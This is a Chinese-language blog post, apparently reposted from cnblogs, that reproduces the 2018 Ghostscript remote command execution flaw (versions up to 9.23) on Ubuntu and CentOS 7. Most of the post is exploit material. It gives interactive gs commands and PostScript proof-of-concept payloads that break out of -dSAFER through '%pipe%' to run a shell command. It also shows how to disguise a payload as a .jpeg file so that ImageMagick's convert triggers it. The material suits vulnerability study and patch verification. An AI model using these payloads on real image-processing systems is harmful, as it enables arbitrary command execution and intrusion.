码迷,mamicode.com
首页 > 其他好文 > 详细

ghostscript 远程命令执行漏洞复现

时间:2018-08-23 14:20:17      阅读:807      评论:0      收藏:0      [点我收藏+]

标签:ops   bubuko   output   http   jpg   centos 7   user   out   依次   

影响的版本 <= 9.23(全版本、全平台)

Ubuntu

开启 ghostscript

sch01ar@ubuntu:~$ gs -q -sDEVICE=ppmraw -dSAFER -s0utputFile=/dev/null

依次输入

legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage

执行结果

技术分享图片

poc

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops

用 vim 将 poc 保存为 test.jpeg,执行

sch01ar@ubuntu:~$ convert test.jpeg 1.jpg

执行结果,1.jpg 随便写

技术分享图片

Centos 7

开启 ghostscript

[root@sch01ar ~]# gs -q -sDEVICE=ppmraw -dSAFER -s0utputFile=/dev/null

依次输入

legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage

执行结果

技术分享图片

poc

%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%id) currentdevice putdeviceprops

 

ghostscript 远程命令执行漏洞复现

标签:ops   bubuko   output   http   jpg   centos 7   user   out   依次   

原文地址:https://www.cnblogs.com/sch01ar/p/9523155.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!